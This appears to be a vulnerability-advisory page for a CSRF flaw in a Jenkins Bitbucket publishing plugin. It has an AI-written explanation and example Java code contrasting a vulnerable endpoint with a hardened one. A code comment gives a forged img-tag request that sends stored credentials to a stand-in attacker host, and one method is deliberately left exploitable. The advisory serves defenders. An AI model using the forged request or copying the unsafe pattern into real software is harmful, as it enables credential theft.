VYPR
Moderate severity · NVD Advisory · Published Oct 29, 2025 · Updated Nov 4, 2025

CVE-2025-64149

Description

A cross-site request forgery (CSRF) vulnerability in Jenkins Publish to Bitbucket Plugin 0.4 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

A CSRF vulnerability in Jenkins Publish to Bitbucket Plugin 0.4 and earlier lets an attacker capture stored Jenkins credentials by tricking an authenticated user's browser into making Jenkins connect to an attacker-controlled URL with those credentials.

A cross-site request forgery (CSRF) vulnerability exists in the Jenkins Publish to Bitbucket Plugin versions 0.4 and earlier. An affected endpoint does not require POST requests, and Jenkins' crumb-based CSRF protection is enforced only on POST, so a request to that endpoint can be forged from any site the victim visits. The forged request causes the plugin to connect to an attacker-specified URL using an attacker-specified credentials ID obtained through another method [1][3].

To exploit this vulnerability, an attacker must first know a valid credentials ID stored in Jenkins (e.g., via a separate information disclosure flaw, or simply because IDs are often human-chosen and guessable) and then trick a Jenkins user with sufficient permissions into visiting a page that issues the crafted request, for example through a link, an embedded image, or an auto-submitting form. Jenkins then opens a connection to the attacker-controlled URL and authenticates with the credentials bound to that ID, so the attacker's server receives them [2][3]. Two preconditions apply in practice: the victim's browser must hold a valid Jenkins session, and the Jenkins controller must be able to reach the attacker's URL over the network.
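
The following is an added illustration of the endpoint shape the advisory describes; it is not the Publish to Bitbucket Plugin's code and the class, method names and the plugin's real endpoint paths are hypothetical. It shows a Jenkins form-validation method that accepts a URL and a credentials ID, first in the form that is forgeable by GET, then hardened with the `@POST` annotation (so Stapler rejects GET and the crumb check applies) and a permission check (so a low-privileged user cannot use an ID they merely know). The Jenkins, Stapler and Credentials Plugin APIs used are the standard ones.

```java
// Added example, not the plugin's own code. Names are hypothetical.
import com.cloudbees.plugins.credentials.CredentialsMatchers;
import com.cloudbees.plugins.credentials.CredentialsProvider;
import com.cloudbees.plugins.credentials.common.StandardUsernamePasswordCredentials;
import com.cloudbees.plugins.credentials.domains.DomainRequirement;
import hudson.model.Item;
import hudson.security.ACL;
import hudson.util.FormValidation;
import jenkins.model.Jenkins;
import org.kohsuke.stapler.AncestorInPath;
import org.kohsuke.stapler.QueryParameter;
import org.kohsuke.stapler.verb.POST;

import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.Collections;

public class ExampleServerDescriptor {

    // Shared helper: resolve the credentials ID in the Jenkins credentials store and
    // probe `url` with HTTP Basic auth built from the stored username and password.
    private static FormValidation probe(Item item, String url, String credentialsId) throws Exception {
        StandardUsernamePasswordCredentials c = CredentialsMatchers.firstOrNull(
                CredentialsProvider.lookupCredentials(
                        StandardUsernamePasswordCredentials.class, item, ACL.SYSTEM,
                        Collections.<DomainRequirement>emptyList()),
                CredentialsMatchers.withId(credentialsId));
        if (c == null) {
            return FormValidation.error("Unknown credentials ID");
        }
        String token = Base64.getEncoder().encodeToString(
                (c.getUsername() + ":" + c.getPassword().getPlainText())
                        .getBytes(StandardCharsets.UTF_8));
        HttpURLConnection conn = (HttpURLConnection) new URL(url).openConnection();
        // If `url` is attacker-controlled, this header is exactly what the attacker's
        // server logs: the plaintext username and password stored in Jenkins.
        conn.setRequestProperty("Authorization", "Basic " + token);
        int status = conn.getResponseCode();
        return status < 400 ? FormValidation.ok("Connection OK")
                            : FormValidation.error("HTTP " + status);
    }

    // VULNERABLE SHAPE: no @POST, so the method is reachable by a plain GET.
    // Jenkins' CrumbFilter only checks POST requests, so a page that embeds
    //   <img src="https://JENKINS/<descriptor-path>/doTestConnectionUnsafe?url=ATTACKER&credentialsId=ID">
    // (path hypothetical) makes a logged-in victim's browser trigger the probe.
    // No permission check either: any user with Overall/Read could call it directly.
    public FormValidation doTestConnectionUnsafe(@AncestorInPath Item item,
            @QueryParameter String url, @QueryParameter String credentialsId) throws Exception {
        return probe(item, url, credentialsId);
    }

    // HARDENED SHAPE: @POST makes Stapler refuse non-POST requests, which brings the
    // request under the crumb (CSRF token) check; the permission check ties the call
    // to a user who is allowed to configure the item (or administer Jenkins globally).
    @POST
    public FormValidation doTestConnection(@AncestorInPath Item item,
            @QueryParameter String url, @QueryParameter String credentialsId) throws Exception {
        if (item == null) {
            Jenkins.get().checkPermission(Jenkins.ADMINISTER);
        } else {
            item.checkPermission(Item.CONFIGURE);
        }
        return probe(item, url, credentialsId);
    }
}
```

Because the hardened method is POST-only, the Jelly view that calls it must also submit by POST (`f:validateButton` does so by default; a `checkUrl` on a text field needs `checkMethod="post"`), otherwise the UI's own validation calls are rejected. When auditing a plugin for this class of bug, grep its `do*` methods for ones that take a URL or `credentialsId` parameter and lack both `@POST` (or `@RequirePOST`) and a `checkPermission` call.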

The impact is credential theft: an attacker captures credentials stored in Jenkins, typically the username and password or token the plugin uses to reach Bitbucket, and can then reach whatever systems and services those credentials protect, which can open a path to further compromise of the organization's infrastructure [1][2].

As of the advisory publication on October 29, 2025, the vulnerability remains unpatched; no fixed version of the plugin has been released. Users are advised to uninstall or disable the plugin if it is not essential and to monitor for updates from Jenkins [1][2]. Note that Jenkins' built-in CSRF protection (crumbs) is not a workaround here: it is already on by default and applies only to POST requests, which is precisely why a GET-reachable endpoint is forgeable. Where the plugin must stay installed, restricting who can configure jobs that use it limits exposure, and blocking GET requests to the plugin's form-validation endpoints at a reverse proxy is possible if those paths are identified; rotating any credentials the plugin uses is prudent once a fixed version is available.

AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package                                        Ecosystem   Affected versions   Patched versions
org.jenkins-ci.plugins:publish-to-bitbucket    Maven       <= 0.4              none

Affected products: 2

Patches: 0 (no patches discovered yet)

Vulnerability mechanics: AI mechanics synthesis has not run for this CVE yet.

References: 4

News mentions: 1